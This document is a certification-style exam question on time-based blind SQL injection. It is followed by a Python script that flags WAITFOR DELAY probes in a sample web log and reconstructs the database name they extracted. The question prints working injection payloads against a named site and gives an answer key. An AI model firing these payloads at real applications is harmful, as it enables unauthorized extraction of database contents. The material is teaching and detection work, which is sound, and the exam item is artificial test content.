A blind SQL injection is a type of SQL injection attack that asks the database true-or-false
questions and determines the answer based on the application's response. This attack is often
used when the web application is configured to show generic error messages but the code that
is vulnerable to SQL injection has not been mitigated.
It is performed when no error message is received from the application while trying to exploit
SQL vulnerabilities. The developer's specific message is displayed instead of an error
message, so it is quite difficult to find the SQL vulnerability in such cases.
A pen tester is trying to extract the database name by using a blind SQL injection. He tests
the database using the queries below and finally finds the database name.
http://juggyboy.com/page.aspx?id=1 ; IF (LEN(DB_NAME())=4) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1 ; IF (ASCII(lower(substring((DB_NAME()),1,1)))=97) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1 ; IF (ASCII(lower(substring((DB_NAME()),2,1)))=98) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1 ; IF (ASCII(lower(substring((DB_NAME()),3,1)))=99) WAITFOR DELAY '00:00:10'--
http://juggyboy.com/page.aspx?id=1 ; IF (ASCII(lower(substring((DB_NAME()),4,1)))=100) WAITFOR DELAY '00:00:10'--
What is the database name?
A. WXYZ
B. PQRS
C. EFGH
D. ABCD
Explanation:
Reference:
http://www.scribd.com/doc/184891028/CEHv8-Module-14-SQL-Injection-pdf (see module 14, page 2049 to 2051)
“D”
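The same probes seen from the log-review side, as an added example that is not part of the original question: the script flags WAITFOR DELAY requests in a web log and rebuilds the value whose checks were confirmed by a delayed response. The log layout (URI plus time-taken in milliseconds), the timings and the function name analyze are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log: (request URI, time-taken in ms). The payloads follow the
# page's probes; the timings, the =122 row and the benign row are made up.
P = "/page.aspx?id=1; IF "
W = " WAITFOR DELAY '00:00:10'--"
SAMPLE_LOG = [
    (P + "(LEN(DB_NAME())=4)" + W, 10042),
    (P + "(ASCII(lower(substring((DB_NAME()),1,1)))=122)" + W, 35),
    (P + "(ASCII(lower(substring((DB_NAME()),1,1)))=97)" + W, 10051),
    (P + "(ASCII(lower(substring((DB_NAME()),2,1)))=98)" + W, 10038),
    # Same probe shape as it would appear percent-encoded in a log.
    ("/page.aspx?id=1%3B%20IF%20(ASCII(lower(substring((DB_NAME())%2C3%2C1)))%3D99)"
     "%20WAITFOR%20DELAY%20'00%3A00%3A10'--", 10047),
    (P + "(ASCII(lower(substring((DB_NAME()),4,1)))=100)" + W, 10040),
    ("/page.aspx?id=2", 31),
]

DELAY_RE = re.compile(r"WAITFOR\s+DELAY\s+'(\d+):(\d+):(\d+)'", re.I)
LEN_RE = re.compile(r"LEN\s*\(\s*DB_NAME\s*\(\s*\)\s*\)\s*=\s*(\d+)", re.I)
CHAR_RE = re.compile(
    r"substring\s*\(\s*\(?\s*DB_NAME\s*\(\s*\)\s*\)?\s*,\s*(\d+)\s*,\s*1\s*\)"
    r"\s*\)\s*\)\s*=\s*(\d+)", re.I)


def analyze(log):
    """Return (flagged URIs, confirmed length, confirmed string) for timed probes."""
    flagged, length, chars = [], None, {}
    for uri, ms in log:
        query = unquote_plus(uri)
        delay = DELAY_RE.search(query)
        if not delay:
            continue
        flagged.append(uri)
        h, m, s = map(int, delay.groups())
        if ms < (h * 3600 + m * 60 + s) * 1000:
            continue  # response was not delayed, so the tested condition was false
        if hit := LEN_RE.search(query):
            length = int(hit.group(1))
        elif hit := CHAR_RE.search(query):
            chars[int(hit.group(1))] = chr(int(hit.group(2)))
    size = length or max(chars, default=0)
    return flagged, length, "".join(chars.get(i, "?") for i in range(1, size + 1))


if __name__ == "__main__":
    flagged, length, name = analyze(SAMPLE_LOG)
    print(f"{len(flagged)} probes, length={length}, name={name!r}")
```

Because the probes wrap the value in lower(), the log only reveals the name case-insensitively; the codes 97, 98, 99, 100 decode to a, b, c, d.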